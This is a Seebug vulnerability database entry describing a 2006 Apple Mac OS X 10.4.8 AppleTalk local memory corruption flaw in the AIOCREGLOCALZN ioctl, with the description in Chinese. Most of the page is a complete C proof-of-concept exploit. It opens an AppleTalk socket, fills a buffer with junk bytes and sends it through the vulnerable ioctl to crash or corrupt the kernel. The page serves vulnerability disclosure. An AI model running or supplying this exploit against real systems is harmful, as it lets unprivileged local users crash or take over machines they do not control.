Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:598
HistoryNov 29, 2006 - 12:00 a.m.

Apple Mac OS X AppleTalk 本地内存破坏漏洞

2006-11-2900:00:00
Root
www.seebug.org
22
JSON

Apple Mac OS X是一款基于BSD的操作系统。

Apple Mac OS X AppleTalk存在一个内存错误,本地攻击者可以利用漏洞使系统崩溃,或执行任意指令。

问题存在于AIOCREGLOCALZN ioctl命令不正确验证输入数据,非特权用户可以打开一个AppleTalk套接字,通过特殊构建的数据结构发送ioctl控制命令来触发。

Apple Mac OS X Server 10.4.8
Apple Mac OS X 10.4.8
目前没有详细解决方案提供:

<a href=“http://www.apple.com/macosx/” target=“_blank”>http://www.apple.com/macosx/</a>


                                                /*
 * Copyright 2006 (c) LMH &lt;[email protected]&gt;.
 * All Rights Reserved.
 * ----           
 *
 *               .--. .--.           _____________________________________
 *          _..-: (X :  o :-.._     / heya! me Gruber Duckie. I'm an 眉ber |
 *      .-''    `.__.:.__.'    ``-./___    proud zealot and Mac Beggar!   |
 *    .'          .'   `.          `.  \__________________________________|
 *   :  '.        :     :        .'  ;  (...fear my Delusional Zealot Army !)
 *   :    :-..__  `.___.'  __..-;    ;
 *   `.    `.   ''-------''   .'    ,'
 *     `.    `.             .'    .' 
 *       `._   `-._     _.-'   _.'   kudos to ilja, kevin, hdm, johnnycsh, et al.
 *          `-._   '&quot;'&quot;'   _.-'      proof of concept for MOKB-27-11-2006.
 *              ``-------''
 */

#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;string.h&gt;
#include &lt;stdio.h&gt;
#include &lt;fcntl.h&gt;
#include &lt;stdarg.h&gt;
#include &lt;sys/param.h&gt;
#include &lt;sys/socket.h&gt;
#include &lt;sys/ioctl.h&gt;
#include &lt;sys/sockio.h&gt;

typedef struct at_state {
	unsigned int	flags;
} at_state_t;

/* if testing on PPC, you need to use the proper values. read netat/at_var.h */
#undef	AF_APPLETALK
#define AIOCGETSTATE	0x8021610b	/* get AT global state */
#define AIOCREGLOCALZN	0x8021610b
#define AT_ST_STARTED	0x0001
#define	AF_APPLETALK	0x10

char powder[4096];

unsigned long do_semtex(char *p, size_t len) {
	int i;
    size_t longsize = sizeof(long);
    unsigned long *daringwussball;

	daringwussball = (unsigned long *)p;
	for (i = 0; i &lt; len; i+=longsize) {
		*daringwussball++ = 0x61;
	}

	return (unsigned long)&amp;powder;
}

int main(int argc, char **argv) {
        int fd;
        at_state_t global_state;
		unsigned long pkt;

        if ((fd = socket(AF_APPLETALK, SOCK_RAW, 0)) &lt; 0)
                exit(1);

		/* check if AppleTalk stack has been started */
        if (ioctl(fd, AIOCGETSTATE, &amp;global_state) &lt; 0) {
                close(fd);
                exit(2);
        }

        if (global_state.flags &amp; AT_ST_STARTED) {
                printf(&quot;appletalk-exploit-1: 0x%08x\n&quot;, global_state);
        } else {
                printf(&quot;appletalk-exploit-1: AppleTalk isn't enabled!\n&quot;);
                exit(3);
        }

		pkt = do_semtex(powder, sizeof(powder));
		ioctl(fd, AIOCREGLOCALZN, pkt);

        close(fd);
        return 0;
}
JSON